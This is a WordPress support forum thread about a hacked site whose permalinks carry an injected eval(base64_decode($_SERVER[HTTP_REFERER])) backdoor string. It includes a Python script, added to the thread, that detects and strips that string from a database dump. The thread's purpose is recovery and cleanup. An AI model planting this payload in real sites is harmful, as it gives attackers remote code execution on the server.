WordPress.org

[Resolved] Hacked? Links are broken

  • geoff67
    Member

    @geoff67

    I’ve been trying to fix this for 4 hours now and can’t seem to figure out what’s wrong.

    Dynamically generated links (posts, comments, etc.) have the following appended to their ends.
    %&({$eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    I’ve looked at countless hacked threads, php injection solutions, Googled everything I can think of, and I’ve done all of the steps to Hardening WP.

    Any idea what’s going on, or where to look next?

Viewing 6 replies - 1 through 6 (of 6 total)
  • geoff67
    Member

    @geoff67

    Oh, and here’s the link to the website: shafr.org.

    Hummm… I’ve typically seen that in the source code, but it looks like yours may be in the database. Have you looked in wp-config.php to make sure it’s clean?

    geoff67
    Member

    @geoff67

    wp-config.php is normal. DB stuff at top, keys, table prefix, lang and the wp-settings.php line.

    I would suggest dumping your db and searching it. Typically, this code will be exactly the same, so once you find one instance of it, you can do a search/replace to clean it, then drop your original tables and import your cleaned db. Of course, this will not fix the problem that allowed this in the first place, but it should get you an operational blog back.
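
The dump-and-search cleanup suggested above, as an added example that is not part of the original thread: it counts each variation of the injected string in a SQL dump, strips them, and corrects the `s:LEN` prefix of any PHP-serialized string it shortens, since WordPress stores many options serialized and a plain search/replace leaves those lengths wrong. The second variant, the sample rows, and the assumed shape of a run (starts with `%&(`, ends with `&%/`, no quotes, backslashes or whitespace) are constructed for illustration.

```python
import re
from collections import Counter

# Core of the string quoted in the thread; the wrapper around it varied ("4 variations").
MARKER = "eval(base64_decode($_SERVER[HTTP_REFERER]))"
BAD = "%&({$" + MARKER + "}}|.+)&%/"   # exactly the string posted in the thread
BAD2 = "%&(" + MARKER + "|.+)&%/"      # constructed second variant, for illustration

# Assumption: a run starts at "%&(", ends at "&%/", and holds no quotes, backslashes or spaces.
SAFE = r"""[^\s'"\\]*?"""
INJECTED = re.compile(r"%&\(" + SAFE + re.escape(MARKER) + SAFE + r"&%/")
# A PHP-serialized string as mysqldump writes it inside a quoted value: s:LEN:\"...\";
SERIALIZED = re.compile(r's:(\d+):\\"(.*?)\\";', re.S)


def find_variants(sql):
    """Count each distinct injected run so every variation is seen before replacing."""
    return Counter(m.group(0) for m in INJECTED.finditer(sql))


def clean_dump(sql):
    """Strip injected runs; shrink s:LEN of serialized strings that contained one."""
    def fix(m):
        body = m.group(2)
        cleaned = INJECTED.sub("", body)
        # The removed run has no SQL escapes, so dump bytes equal real bytes here.
        removed = len(body.encode("utf-8")) - len(cleaned.encode("utf-8"))
        if not removed:
            return m.group(0)
        return 's:%d:\\"%s\\";' % (int(m.group(1)) - removed, cleaned)
    return INJECTED.sub("", SERIALIZED.sub(fix, sql))


# Constructed sample dump rows (not from the thread): one plain value, one serialized value.
SER_VAL = 'a:1:{s:1:\\"k\\";s:%d:\\"/tag/%s\\";}' % (5 + len(BAD2), BAD2)
SAMPLE = ("INSERT INTO `wp_options` VALUES (1,'permalink_structure','/%postname%/" + BAD + "','yes');\n"
          "INSERT INTO `wp_options` VALUES (2,'demo_option','" + SER_VAL + "','yes');\n")

if __name__ == "__main__":
    for variant, count in find_variants(SAMPLE).items():
        print(count, variant)
    print(clean_dump(SAMPLE))
```

Run `find_variants` on the dump first and review the list; any hit it does not report (for example a URL-encoded form) needs its own pattern before the cleaned dump is imported.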

    geoff67
    Member

    @geoff67

    Thanks for the suggestion. I found 38 instances, in 4 variations. Uploading new db now.

    Do you know what would’ve caused this? I don’t want another SQL bug.

    geoff67
    Member

    @geoff67

    Amazing. That fixed it. Thanks so much, figaro.
